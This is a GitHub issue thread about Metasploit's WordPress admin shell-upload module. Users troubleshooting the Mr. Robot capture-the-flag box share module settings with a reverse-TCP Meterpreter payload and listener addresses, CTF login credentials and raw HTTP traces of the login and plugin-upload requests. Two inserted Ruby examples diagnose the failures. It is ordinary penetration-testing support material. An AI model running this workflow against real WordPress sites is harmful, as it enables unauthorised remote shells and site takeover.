rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

exploit/unix/webapp/wp_admin_shell_upload: The target does not appear to be using WordPress #10838

Closed Darkcast closed 6 years ago

Darkcast commented 6 years ago

I am running the Mr.Robot CTF and when I try to use the wp_admin_shell_upload.rb the module says that the site is not running wp.

PS. the ctf is running on a VMware

Steps to reproduce

use metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
set requested data (see below)

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   [redacted]        yes       The WordPress password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.0.16         yes       The target address
   RPORT      80                         yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  wp-login.php     yes       The base path to the wordpress application
   USERNAME   [redacted]                 yes       The WordPress username to authenticate with
   VHOST                                   no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.17     yes       The listen address (an interface may be specified)
   LPORT  4444                  yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

Expected behavior

What should happen? Create a shell.

Current behavior

msf exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.0.17:4444 
**[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress**
**[*] Exploit completed, but no session was created.**
msf exploit(unix/webapp/wp_admin_shell_upload) > 

What happens instead? It says the target is not using wp.

You might also want to check the last ~1k lines of /opt/metasploit/apps/pro/engine/config/logs/framework.log or ~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

msf exploit(unix/webapp/wp_admin_shell_upload) > version
Framework: 4.17.18-dev
Console : 4.17.18-dev

I installed Metasploit with:

OS

What OS are you running Metasploit on?

KALI BABY WOOOOO

Linux kali 4.18.0-kali1-amd64 #1 SMP Debian 4.18.6-1kali1 (2018-09-10) x86_64 GNU/Linux

bcoles commented 6 years ago

You can disable the WordPress check with: set WPCHECK false

msf5 exploit(unix/webapp/wp_admin_shell_upload) > show advanced options

Module advanced options (exploit/unix/webapp/wp_admin_shell_upload):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for windows authentification
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, TLS1, TLS1.2, TLS1.1, SSL3, SSL23)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WPCHECK                 true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR            wp-content                                          yes       The name of the wp-content directory
   WfsDelay                0                                                   no        Additional delay when waiting for a session

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf5 exploit(unix/webapp/wp_admin_shell_upload) > 
wvu commented 6 years ago

Your TARGETURI of wp-login.php is incorrect. It should be / or other. The filename is added by the API.

And please don't post spoilers.
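
The two answers above both come down to what the module does with TARGETURI and what its WordPress check looks for. The following is an added example, not code from metasploit-framework: an illustrative re-implementation of the URI join the framework performs (the real helper collapses repeated slashes and guarantees a leading slash; the module itself appends wp-login.php), plus a small "does this page look like WordPress" fingerprint whose regexes are this example's own choice rather than the module's exact WPCHECK logic. The sample HTML bodies are constructed.

```ruby
# Added example (not code from metasploit-framework): why TARGETURI must be the
# WordPress base path, and what a "does this look like WordPress" check keys on.

# Illustrative re-implementation of how the framework joins URI segments: parts
# are joined with '/', repeated slashes are collapsed, and a leading slash is
# guaranteed. Assumption: this matches the real helper for the inputs used here.
def normalize_uri(*parts)
  path = parts.join('/').gsub(%r{/+}, '/')
  path.start_with?('/') ? path : "/#{path}"
end

# The module appends wp-login.php itself, so TARGETURI must be the directory
# WordPress lives under, not the login script. Setting it to wp-login.php
# produces /wp-login.php/wp-login.php, which is why the WordPress check fails.
def login_path(target_uri)
  normalize_uri(target_uri, 'wp-login.php')
end

# Signatures a WordPress front page normally exposes. These regexes are this
# example's own choice, not the module's exact WPCHECK logic.
WP_MARKERS = [
  %r{/wp-content/}i,
  %r{/wp-includes/}i,
  /<meta\s+name="generator"\s+content="WordPress/i,
  %r{/xmlrpc\.php}i
].freeze

def looks_like_wordpress?(html)
  WP_MARKERS.any? { |re| html.match?(re) }
end

# Constructed sample bodies: a typical WordPress home page and a plain page
# at the same (documentation-range) host that exposes no WordPress assets.
SAMPLE_WP_HOME = <<~HTML
  <html><head>
  <meta name="generator" content="WordPress 4.3.1" />
  <link rel="stylesheet" href="http://192.0.2.10/wp-content/themes/twentyfifteen/style.css" />
  <script src="http://192.0.2.10/wp-includes/js/jquery/jquery.js"></script>
  </head><body>Hello world!</body></html>
HTML

SAMPLE_PLAIN_HOME = <<~HTML
  <html><head><title>Welcome</title></head>
  <body><p>Nothing to see here.</p></body></html>
HTML

if __FILE__ == $PROGRAM_NAME
  ['/', '/blog/', 'wp-login.php'].each do |t|
    puts "TARGETURI=#{t.inspect} -> login request goes to #{login_path(t)}"
  end
  puts "WP home looks like WordPress? #{looks_like_wordpress?(SAMPLE_WP_HOME)}"
  puts "plain page looks like WordPress? #{looks_like_wordpress?(SAMPLE_PLAIN_HOME)}"
end
```

Running it shows `/` and `/blog/` mapping to the expected login path while `wp-login.php` doubles up. On the fingerprint side, a site that hides its wp-content and wp-includes paths (a hardened install behind a rewriting proxy, for instance) will also trip the not-found failure, which is the case `set WPCHECK false` is meant for; it does not help when TARGETURI itself is wrong.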

Gakovski commented 3 years ago

I have a similar problem. I had this problem, but now I have another one.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Authenticating with WordPress using admin:password123...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.

(username and password are correct)

h00die commented 3 years ago

@Gakovski can you re-run with show httptrace true, that will better help with diagnosing. What version of metasploit, and wordpress are being used?

Gakovski commented 3 years ago

@h00die here's the output with httptrace enabled

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Authenticating with WordPress using admin:password123...
####################
# Request:
####################
POST /wp-login.php HTTP/1.1
Host: 192.168.73.78
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

log=admin&pwd=password123&redirect_to=/cqQAXBGJ&wp-submit=Login
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Thu, 20 May 2021 14:49:11 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 362
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
 Instead use the HTTPS scheme to access this URL, please.<br />
</p>
</body></html>

[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.

Metasploit version: metasploit v6.0.43-dev
Wordpress version: 3.7.2

It seems that the whole wordpress is read only and that's why I can't upload the payload.

Here's more information. If I use set ssl true and re-run the exploit, this is the output.


</head>
<body id="error-page">
        <p>Unable to create directory wp-content/uploads/2021/05. Is its parent directory writable by the server?</p></body>
</html>

[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
h00die commented 3 years ago

Correct, you need set ssl true, and after that it looks like the server is configured to not allow creation of directories. This doesn't seem to be a metasploit issue, but a server configuration issue

dikshitkhandelwal commented 3 years ago

I am having the same problem! I tried to exploit after setting SSL to true, and it threw a different error. The username and password are correct. I have not shown here

msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.0.61:4444 
[*] Authenticating with WordPress using USERNAME:PASSWORD..
####################
# Request:
####################
POST /wp-login.php HTTP/1.1
Host: 10.10.95.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

log=elliot&pwd=ER28-0652&redirect_to=/nNCJdonU&wp-submit=Login
SSL_connect returned=1 errno=0 state=error: wrong version number
[-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: wrong version number
[*] Exploit completed, but no session was created.


Metasploit version: metasploit v6.0.48-dev
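
The failures in this thread are three different things wearing the same "no session" message: plain HTTP sent to a TLS port (the Apache 400 above, which h00die diagnosed), TLS sent to a plain-HTTP port (the `wrong version number` SSLError in the last trace), and a server whose wp-content/uploads is not writable. The following is an added example, not Metasploit code: a small triage routine that reads console or HttpTrace output and names the likely cause. The rule table and suggested fixes are this example's own; the matched messages are the ones quoted in this thread, and the trace excerpts are constructed from them.

```ruby
# Added example (not Metasploit code): triage of wp_admin_shell_upload failures
# from HttpTrace/console output. The matched messages are the ones quoted in
# this issue; the rule table and the suggested fixes are this example's own.

Diagnosis = Struct.new(:cause, :fix)

# Ordered: transport-level mismatches are checked before the generic
# authentication failure, because the latter is only a symptom of the former.
TRIAGE_RULES = [
  [/speaking plain HTTP to an SSL-enabled server port/i,
   Diagnosis.new(:plain_http_to_tls_port,
                 'RPORT is a TLS port; set SSL true')],
  [/SSL_connect .*wrong version number/i,
   Diagnosis.new(:tls_to_plain_port,
                 'RPORT speaks plain HTTP; set SSL false or point RPORT at the HTTPS port')],
  [%r{Unable to create directory wp-content/uploads}i,
   Diagnosis.new(:uploads_dir_not_writable,
                 'server-side: wp-content/uploads is not writable by the web server user; ' \
                 'a read-only wp-content blocks plugin upload and is not a framework bug')],
  [/does not appear to be using WordPress/i,
   Diagnosis.new(:wp_fingerprint_failed,
                 'TARGETURI should be the WordPress base path such as /; the module appends wp-login.php itself')],
  [/Failed to authenticate with WordPress/i,
   Diagnosis.new(:auth_rejected,
                 'credentials rejected by wp-login.php with no transport error; re-check USERNAME, PASSWORD and TARGETURI')]
].freeze

# Returns the first matching Diagnosis, or :unknown when no rule fires.
def triage(output)
  TRIAGE_RULES.each do |pattern, diagnosis|
    return diagnosis if output.match?(pattern)
  end
  Diagnosis.new(:unknown, 'no known signature; enable HttpTrace and inspect the raw response')
end

# Constructed excerpts reproducing the failure shapes seen in this thread.
TRACE_PLAIN_TO_TLS = <<~TRACE
  HTTP/1.1 400 Bad Request
  Server: Apache/2.4.25 (Debian)
  Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
  [-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
TRACE

TRACE_TLS_TO_PLAIN = <<~TRACE
  POST /wp-login.php HTTP/1.1
  [-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: wrong version number
TRACE

TRACE_READONLY_UPLOADS = <<~TRACE
  <p>Unable to create directory wp-content/uploads/2021/05. Is its parent directory writable by the server?</p>
  [-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
TRACE

if __FILE__ == $PROGRAM_NAME
  [TRACE_PLAIN_TO_TLS, TRACE_TLS_TO_PLAIN, TRACE_READONLY_UPLOADS].each do |trace|
    d = triage(trace)
    puts "#{d.cause}: #{d.fix}"
  end
end
```

The ordering matters: the plain-HTTP-to-TLS case also contains "Failed to authenticate with WordPress", so a rule set that checked the authentication message first would report bad credentials for what is really a transport mismatch. The third case is worth noting from the hardening side as well: a wp-content tree the web server user cannot write to stops the plugin-upload path this module relies on, at the cost of breaking in-dashboard plugin and media uploads.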

navaneeth-dev commented 3 years ago

> Correct, you need set ssl true, and after that it looks like the server is configured to not allow creation of directories. This doesn't seem to be a metasploit issue, but a server configuration issue

Sorry to open an old issue but how would one allow the creation of directories from wordpress admin itself?

Current Output for Mr.robot ctf:

[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
####################
# Request:
####################
GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1
Host: 10.10.45.132
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_logged_in_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7C0474feaa2e15ec02391bccad8e07d91a5f7c822278c0e3d39be90f65751b9f9f;

####################
# Response:
####################
HTTP/1.1 200 OK
Date: Sun, 08 Aug 2021 05:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.5.29
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Set-Cookie: wp-settings-6=libraryContent%3Dbrowse; expires=Mon, 08-Aug-2022 05:12:57 GMT; Max-Age=31536000; path=/, wp-settings-time-6=1628399577; expires=Mon, 08-Aug-2022 05:12:57 GMT; Max-Age=31536000; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8 wp-toolbar"  lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" class="wp-toolbar"  lang="en-US">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Add Plugins &lsaquo; user&#039;s Blog! &#8212; WordPress</title>
<script type="text/javascript">
addLoadEvent = function(func){if(typeof jQuery!="undefined")jQuery(document).ready(func);else if(typeof wpOnload!='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}};
var ajaxurl = '/wp-admin/admin-ajax.php',
    pagenow = 'plugin-install',
    typenow = '',
    adminpage = 'plugin-install-php',
    thousandsSeparator = ',',
    decimalPoint = '.',
    isRtl = 0;
</script>
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<style type="text/css">
img.wp-smiley,
img.emoji {
    display: inline !important;
    border: none !important;
    box-shadow: none !important;
    height: 1em !important;
    width: 1em !important;
    margin: 0 .07em !important;
    vertical-align: -0.1em !important;
    background: none !important;
    padding: 0 !important;
}
</style>
<link rel='stylesheet' href='http://10.10.45.132/wp-admin/load-styles.php?c=0&amp;dir=ltr&amp;load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&amp;ver=4.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='open-sans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&#038;subset=latin%2Clatin-ext&#038;ver=4.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://10.10.45.132/wp-includes/js/thickbox/thickbox.css?ver=4.3.1' type='text/css' media='all' />
<!--[if lte IE 7]>
<link rel='stylesheet' id='ie-css'  href='http://10.10.45.132/wp-admin/css/ie.min.css?ver=4.3.1' type='text/css' media='all' />
<![endif]-->
        <script type="text/javascript">
            window._wpemojiSettings = {"baseUrl":"http:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/10.10.45.132\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1"}};
            !function(a,b,c){function d(a){var c=b.createElement("canvas"),d=c.getContext&&c.getContext("2d");return d&&d.fillText?(d.textBaseline="top",d.font="600 32px Arial","flag"===a?(d.fillText(String.fromCharCode(55356,56812,55356,56807),0,0),c.toDataURL().length>3e3):(d.fillText(String.fromCharCode(55357,56835),0,0),0!==d.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
        </script>

<script type='text/javascript'>
/* <![CDATA[ */
var userSettings = {"url":"\/","uid":"6","time":"1628399569","secure":""};var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};var _wpUpdatesSettings = {"ajax_nonce":"457cc65d82","l10n":{"updating":"Updating...","updated":"Updated!","updateFailed":"Update Failed: %s","updatingLabel":"Updating %s...","updatedLabel":"%s updated!","updateFailedLabel":"%s update failed","updatingMsg":"Updating... please wait.","updatedMsg":"Update completed successfully.","updateCancel":"Update canceled.","beforeunload":"Plugin updates may not complete if you navigate away from this page."}};/* ]]> */
</script>
<script type='text/javascript' src='http://10.10.45.132/wp-admin/load-scripts.php?c=0&amp;load%5B%5D=jquery-core,jquery-migrate,utils,underscore,wp-util,wp-a11y,updates&amp;ver=4.3.1'></script>
    <link id="wp-admin-canonical" rel="canonical" href="http://10.10.45.132/wp-admin/plugin-install.php?tab=upload" />
    <script>
        if ( window.history.replaceState ) {
            window.history.replaceState( null, null, document.getElementById( 'wp-admin-canonical' ).href + window.location.hash );
        }
    </script>
<script type="text/javascript">var _wpColorScheme = {"icons":{"base":"#999","focus":"#00a0d2","current":"#fff"}};</script>
<style type="text/css" media="print">#wpadminbar { display:none; }</style>
</head>
<body class="wp-admin wp-core-ui no-js  plugin-install-php auto-fold admin-bar branch-4-3 version-4-3-1 admin-color-fresh locale-en-us no-customize-support no-svg">
<script type="text/javascript">
    document.body.className = document.body.className.replace('no-js','js');
</script>

    <script type="text/javascript">
        (function() {
            var request, b = document.body, c = 'className', cs = 'customize-support', rcs = new RegExp('(^|\\s+)(no-)?'+cs+'(\\s+|$)');

            request = true;

            b[c] = b[c].replace( rcs, ' ' );
            b[c] += ( window.postMessage && request ? ' ' : ' no-' ) + cs;
        }());
    </script>

<div id="wpwrap">

<div id="adminmenumain" role="navigation" aria-label="Main menu">
<a href="#wpbody-content" class="screen-reader-shortcut">Skip to main content</a>
<a href="#wp-toolbar" class="screen-reader-shortcut">Skip to toolbar</a>
<div id="adminmenuback"></div>
<div id="adminmenuwrap">
<ul id="adminmenu">

    <li class="wp-first-item wp-has-submenu wp-not-current-submenu menu-top menu-top-first menu-icon-dashboard menu-top-last" id="menu-dashboard">
    <a href='index.php' class="wp-first-item wp-has-submenu wp-not-current-submenu menu-top menu-top-first menu-icon-dashboard menu-top-last" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-dashboard'><br /></div><div class='wp-menu-name'>Dashboard</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Dashboard</li><li class="wp-first-item"><a href='index.php' class="wp-first-item">Home</a></li><li><a href='update-core.php'>Updates <span class='update-plugins count-0' title=''><span class='update-count'>0</span></span></a></li></ul></li>
    <li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
    <li class="wp-has-submenu wp-not-current-submenu open-if-no-js menu-top menu-icon-post menu-top-first" id="menu-posts">
    <a href='edit.php' class="wp-has-submenu wp-not-current-submenu open-if-no-js menu-top menu-icon-post menu-top-first" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-post'><br /></div><div class='wp-menu-name'>Posts</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Posts</li><li class="wp-first-item"><a href='edit.php' class="wp-first-item">All Posts</a></li><li><a href='post-new.php'>Add New</a></li><li><a href='edit-tags.php?taxonomy=category'>Categories</a></li><li><a href='edit-tags.php?taxonomy=post_tag'>Tags</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-media" id="menu-media">
    <a href='upload.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-media" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-media'><br /></div><div class='wp-menu-name'>Media</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Media</li><li class="wp-first-item"><a href='upload.php' class="wp-first-item">Library</a></li><li><a href='media-new.php'>Add New</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-page" id="menu-pages">
    <a href='edit.php?post_type=page' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-page" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-page'><br /></div><div class='wp-menu-name'>Pages</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Pages</li><li class="wp-first-item"><a href='edit.php?post_type=page' class="wp-first-item">All Pages</a></li><li><a href='post-new.php?post_type=page'>Add New</a></li></ul></li>
    <li class="wp-not-current-submenu menu-top menu-icon-comments menu-top-last" id="menu-comments">
    <a href='edit-comments.php' class="wp-not-current-submenu menu-top menu-icon-comments menu-top-last" ><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-comments'><br /></div><div class='wp-menu-name'>Comments <span class='awaiting-mod count-0'><span class='pending-count'>0</span></span></div></a></li>
    <li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-appearance menu-top-first" id="menu-appearance">
    <a href='themes.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-appearance menu-top-first" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-appearance'><br /></div><div class='wp-menu-name'>Appearance</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Appearance</li><li class="wp-first-item"><a href='themes.php' class="wp-first-item">Themes</a></li><li class="hide-if-no-customize"><a href='customize.php?return=%2Fwp-admin%2Fplugin-install.php%3Ftab%3Dupload' class="hide-if-no-customize">Customize</a></li><li><a href='widgets.php'>Widgets</a></li><li><a href='nav-menus.php'>Menus</a></li><li class="hide-if-no-customize"><a href='customize.php?return=%2Fwp-admin%2Fplugin-install.php%3Ftab%3Dupload&#038;autofocus%5Bcontrol%5D=header_image' class="hide-if-no-customize">Header</a></li><li class="hide-if-no-customize"><a href='customize.php?return=%2Fwp-admin%2Fplugin-install.php%3Ftab%3Dupload&#038;autofocus%5Bcontrol%5D=background_image' class="hide-if-no-customize">Background</a></li><li><a href='themes.php?page=custom-header'>Header</a></li><li><a href='themes.php?page=custom-background'>Background</a></li><li><a href='theme-editor.php'>Editor</a></li></ul></li>
    <li class="wp-has-submenu wp-has-current-submenu wp-menu-open menu-top menu-icon-plugins" id="menu-plugins">
    <a href='plugins.php' class="wp-has-submenu wp-has-current-submenu wp-menu-open menu-top menu-icon-plugins" ><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-plugins'><br /></div><div class='wp-menu-name'>Plugins <span class='update-plugins count-0'><span class='plugin-count'>0</span></span></div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Plugins <span class='update-plugins count-0'><span class='plugin-count'>0</span></span></li><li class="wp-first-item"><a href='plugins.php' class="wp-first-item">Installed Plugins</a></li><li class="current"><a href='plugin-install.php' class="current">Add New</a></li><li><a href='plugin-editor.php'>Editor</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-users" id="menu-users">
    <a href='users.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-users" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-users'><br /></div><div class='wp-menu-name'>Users</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Users</li><li class="wp-first-item"><a href='users.php' class="wp-first-item">All Users</a></li><li><a href='user-new.php'>Add New</a></li><li><a href='profile.php'>Your Profile</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-tools" id="menu-tools">
    <a href='tools.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-tools" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-tools'><br /></div><div class='wp-menu-name'>Tools</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Tools</li><li class="wp-first-item"><a href='tools.php' class="wp-first-item">Available Tools</a></li><li><a href='import.php'>Import</a></li><li><a href='export.php'>Export</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-settings menu-top-last" id="menu-settings">
    <a href='options-general.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-settings menu-top-last" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-settings'><br /></div><div class='wp-menu-name'>Settings</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Settings</li><li class="wp-first-item"><a href='options-general.php' class="wp-first-item">General</a></li><li><a href='options-writing.php'>Writing</a></li><li><a href='options-reading.php'>Reading</a></li><li><a href='options-discussion.php'>Discussion</a></li><li><a href='options-media.php'>Media</a></li><li><a href='options-permalink.php'>Permalinks</a></li></ul></li><li id="collapse-menu" class="hide-if-no-js"><div id="collapse-button"><div></div></div><span>Collapse menu</span></li></ul>
</div>
</div>
<div class="clear"></div></div><!-- wpwrap -->
<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
</body>
</html>

####################
# Request:
####################
POST /wp-admin/update.php?action=upload-plugin HTTP/1.1
Host: 10.10.45.132
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_logged_in_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7C0474feaa2e15ec02391bccad8e07d91a5f7c822278c0e3d39be90f65751b9f9f;
Content-Type: multipart/form-data; boundary=_Part_1016_2557091085_2989972072
Content-Length: 2103

--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="_wpnonce"

d4b2632e29
--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/plugin-install.php?tab=upload
--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="pluginzip"; filename="QRGSngvTeh.zip"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="install-plugin-submit"

Install Now
--_Part_1016_2557091085_2989972072--

####################
# Response:
####################
No response received
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
bcoles commented 3 years ago

> Sorry to open an old issue but how would one allow the creation of directories from wordpress admin itself?

